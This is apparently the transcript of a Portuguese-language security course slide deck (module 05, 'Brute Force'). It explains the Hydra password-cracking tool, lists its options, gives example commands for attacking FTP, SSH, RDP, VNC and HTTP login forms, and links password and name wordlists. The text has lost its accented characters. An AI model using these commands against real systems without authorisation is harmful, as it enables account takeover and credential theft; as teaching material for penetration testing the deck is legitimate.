PACÍFICO TASK FORCE: UN ECOSISTEMA DE TRABAJO COLABORATIVO ...
Módulo 05 - Brute Force
-
Upload
ronaldoejessica-costa -
Category
Documents
-
view
235 -
download
6
description
Transcript of Módulo 05 - Brute Force
-
O que temos pra hoje?
Temas de Hoje: Brute Force Conhecendo Hydra Modos de Uso Atacando Servios Padro Atacando HTTP Post Form Brinde! Wordlists grtis
Tcnicas de Invaso Brute Force
-
Brute force com Hydra
Tcnicas de Invaso Brute Force
-
Hydra: Entendendo a ferramenta
O Hydra descobre senha atravs de brute-force (tentativa e erro), ele busca
em wordlists, possveis usurios/senhas e vai testando as combinaes, uma a
uma.
O Hydra tem suporte aos servios Telnet, Formulrio HTTP/HTTPS, SSH, MySQL,
PostgreSQL, MSSQL, SMB, LDAP2 e LDAP3, FTP, SNMP, CVS,VNC, entre outros.
A ferramenta j vem toda instalada e configurada (inclusive com interface grfica)
no BackTrack, porm, caso no tenha instalado, basta fazer o download do cdigo-
fonte e compil-la em qualquer distribuio.
Tcnicas de Invaso Brute Force
-
Hydra: Entendendo a ferramenta
Opes da ferramenta:
-l = Nome/login da vtima;
-L = Carrega uma lista contendo nomes/logins de vtimas (1 por linha);
-p = Especifica senha nica;
-P = Carrega uma lista com senhas (1 por linha);
-e = Adiciona 'n', testa senha em branco ou adicional 's' testa user como pass;
-C = Usado para carregar um arquivo contendo usurio:senha. Formato
usurio:senha equivale a - L/-P;
-M = Carrega lista de servidores alvos (1 por linha);
-o = Salva as senhas encontradas dentro do arquivo que voc especificar;
-f = Faz o programa parar de trabalhar quando a senha ou usurio for
encontrada[o];
-t = Limita o numero de solicitaes por vez (default: 16);
-w = Define o tempo mximo em segundos para esperar resposta do servidor
(default: 30s);
-v / -V = Modo verbose do programa. 'V' mostra todas tentativas.
Tcnicas de Invaso Brute Force
-
Hydra: Modo de Uso
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando servios RDP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 rdp
Atacando servios VNC:
# hydra -L wordlist -P wordlist -v 192.168.2.100 vnc
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Tcnicas de Invaso Brute Force
-
Hydra: Modo de Uso
Exemplos de uso:
Atacando servios de FTP:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ftp -vV
Atacando servios SSH:
# hydra -L wordlist -P wordlist -v 192.168.2.100 ssh
Atacando websites com usurio e senha:
# hydra -l teste -P wordlist 192.168.1.105 http-post-form
"/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
Tcnicas de Invaso Brute Force
-
Brinde: Wordlists
Seguem wordlists em Portugus e Ingls:
Dicionrio da Lingua Portuguesa retirada do BROffice:
# http://www.esecurity.com.br/blackhat2/wordlists/dicionario.txt
Dicinrio: Nomes masculinos e femininos (ENG):
# http://www.esecurity.com.br/blackhat2/wordlists/female-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/male-names.txt
# http://www.esecurity.com.br/blackhat2/wordlists/other-names.txt
Dicionrio com senhas comuns:
# http://www.esecurity.com.br/blackhat2/wordlists/senhas-comuns.txt
Dicionrio com palavras em Portugus + de 120.000 palavras:
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist-ptbr.txt
# http://www.esecurity.com.br/blackhat2/wordlists/wordlist70k.txt
Dicionrio baseada nas contas mais comuns criadas no Linux:
# http://www.esecurity.com.br/blackhat2/wordlists/etc-hosts.txt
Tcnicas de Invaso Brute Force
-
E-mail: [email protected]
Twitter: @esecuritybr e @desafiohacker
Skype: desafiohacker
Fanpage: www.facebook.com/academiahacker
printf ("\Chega por hoje\n");
www.eSecurity.com.br
Tcnicas de Invaso Ataques redes Wifi